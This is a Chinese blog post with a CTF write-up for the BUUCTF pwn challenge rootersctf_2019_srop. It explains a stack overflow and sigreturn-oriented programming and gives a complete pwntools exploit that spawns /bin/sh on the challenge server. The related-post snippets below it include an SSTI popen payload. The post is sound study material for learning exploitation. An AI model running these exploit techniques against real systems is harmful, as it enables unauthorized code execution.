BUUCTF Pwn rootersctf_2019_srop WP

最新推荐文章于 2025-05-16 15:20:27 发布
最新推荐文章于 2025-05-16 15:20:27 发布
阅读量238 收藏 1
点赞数 4
分类专栏: BUUCTF Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/145239988
版权

1.下载 得到文件 checksec exeinfo

64位 使用IDA64打开

很短的程序 用汇编形式查看

先进行一次write 再进行一次read操作 有栈溢出漏洞

题目说了是SROP 从这方面考虑:

看到代码有pop rax操作 所以考虑栈溢出到该地址并且将rax值设为15 利用data段写入binsh:

poprax_addr = 0x401032
syscall_addr = 0x401033
buf = 0x402000
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = buf
frame.rdx = 0x400
frame.rbp = buf
frame.rip = syscall_addr

payload = b'a' * (0x80 + 8) + p64(poprax_addr) + p64(15) + bytes(frame)
p.sendlineafter("CTF?\n", payload)

将rax设置为15执行sigreturn 然后将frame压入栈中 执行第二个read

因为也执行了leave ret  leave指令相当于 mov rsp, rbp;pop rbp

所以要设置ebp指向data段 这样也相当于设置了esp

接下来写入binsh:

frame.rax = constants.SYS_execve
frame.rdi = buf + 0x120
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

payload2 = b'a' * 0x8 + p64(poprax_addr) + p64(15) + bytes(frame)
payload2 = payload2.ljust(0x120, b'a') + b'/bin/sh\x00'
p.sendline(payload2)
p.interactive()

这段代码将再让rax=15执行sigreturn 获得binsh  前面的8个a是填充到返回地址的数据

(如果前面rbp设置为buf+0x20 相当于设置了一个0x20的数组 这里的填充就要写成0x28)

完整exp:

from pwn import *
context(os='linux',arch='amd64')
#p = process('./srop')
p = remote("node5.buuoj.cn",28552 )

poprax_addr = 0x401032
syscall_addr = 0x401033
buf = 0x402000
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = buf
frame.rdx = 0x400
frame.rbp = buf
frame.rip = syscall_addr


payload = b'a' * (0x80 + 8) + p64(poprax_addr) + p64(15) + bytes(frame)
p.sendlineafter("CTF?\n", payload)

frame.rax = constants.SYS_execve
frame.rdi = buf + 0x120
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

payload2 = b'a' * 0x8 + p64(poprax_addr) + p64(15) + bytes(frame)
payload2 = payload2.ljust(0x120, b'a') + b'/bin/sh\x00'
p.sendline(payload2)
p.interactive()

得到flag:

RootersCTF2019 I ♥ Flask
汗的博客
08-29 579
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1673
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
rootersctf_2019_srop
z1r0的博客
03-10 347
rootersctf_2019_srop 查看保护 栈溢出,这一题没有放libc但是有pop rax syscall leave ret所以可以直接使用srop来解决 攻击思路:两次srop 1.构造read(0, data_addr, 0x400)来读入/bin/sh 2.有了/bin/sh之后使用execve这个函数来执行execve("/bin/sh", 0, 0);使得可以getshell 溢出的大小的话buf为0x80所以64位下就是0x88。具体的srop可以看ctf-wiki 这里的dat
BUUCTF rootersctf_2019_srop
zwb2603096342的博客
07-08 430
ctf高阶rop中srop的简单运用
srop学习 rootersctf_2019_srop
weixin_46521144的博客
10-12 574
rootersctf_2019_srop 前置知识 这里有必要讲一下什么是srop。ctf_wiki的描述 这里我也简单说一下我的理解。就是内核处理信号(软中断)的时候,会将寄存器压栈到用户地址空间(这里有点小疑惑,因为内核切换进程的时候压栈是属于到内核地址空间,这里是用户地址空间)然后切换回来的时候,调用rt_sigreturnpop回来之前保存的寄存器等。那么我们只要拥有这个gardet,就可以控制程序执行流以及次奥用的系统调用的参数。而触发pop这些寄存器的方法就是直接调用这个rt_sigreturn
srop学习:【rootersctf_2019_srop
weixin_51055545的博客
03-24 5885
最近学习了一些srop的一些知识,这里通过一道题目来加深一下对srop的运用。 文章目录1.srop的简单介绍2.rootersctf_2019_srop题目例行检查漏洞分析 1.srop的简单介绍 这里推荐大家一篇文章srop SROP全称为Sigreturn Oriented Programming,其攻击核心为通过伪造一个‘Signal Frame’(以下简称sigFrame)在栈上,同时触发sigreturn系统调用,让内核为我们恢复一个sigFrame所描述的进程,如一个shell、一个wrtie
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 411
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop
2301_79326813的博客
01-30 532
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP
weixin_44145820的博客
06-05 1643
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4223
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
SROP三连击(ciscn_2019_es_7、rootersctf_2019_srop、360chunqiu2017_smallest)
huzai9527的博客
03-25 497
SROP】ciscn_2019_es_7 1. ida 分析 vuln有两个函数,read、write;read函数存在栈溢出,write能够泄露栈上的地址 存在sigreturn的调用 2. 思路 首先泄露栈上的返回地址,然后通过gdb调试,输入的参数与返回地址的偏移 有了参数地址,站地址-偏移,就可以输入/bin/sh且得到它的地址 有了/bin/sh、栈地址、sigreturn、syscall就可以使用SROP 3. exp from pwn import * #p = proces
BUUCTF pwn rootersctf_2019_xsh
stareforever的博客
02-23 2013
查看保护,基本全开 IDA查看程序 程序读入命令,并通过子函数 run 执行 run函数 对读入的命令进行判断,只能执行ls, echo, zooo指令, 这里可以发现echo 命令存在format string 漏洞, 首先测试可以确定偏移为24 那么整体的思想就是修改程序提供的函数的got表为system@plt,然后再输入内容/bin/sh即可获得shell,目前可以利用的函数为strncmp和strtok函数 首先需要泄露piebase的值,这里介绍覆盖strncmp函数(strtok同理)
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 644
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
BUUCTF:[RootersCTF2019]babyWeb
末初 · mochu7
08-02 1701
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 297
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 223
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 533
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
中大型水闸安全监测系统解决方案
最新发布
weixin_48039531的博客
05-16 757
然而,由于历史原因,许多水闸存在建设标准偏低、质量较差、配套设施不完善等问题,加之受“重建轻管”思想影响,多数水闸建成后缺乏有效的管理和维修养护,存在较多的安全隐患,安全运行风险突出。现代化的水闸安全监测系统不仅能够实现实时监测、数据分析、预警报警等功能,还能够通过三维可视化技术,实现水闸运行状态、水流情况、水位变化等数据的直观展示,为管理决策提供更加科学、准确的依据。通过实时监控水闸的结构状态、水文数据和环境变化,可以及时发现潜在的风险和问题,从而采取相应的预防措施,确保水闸的稳定性和耐久性。
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值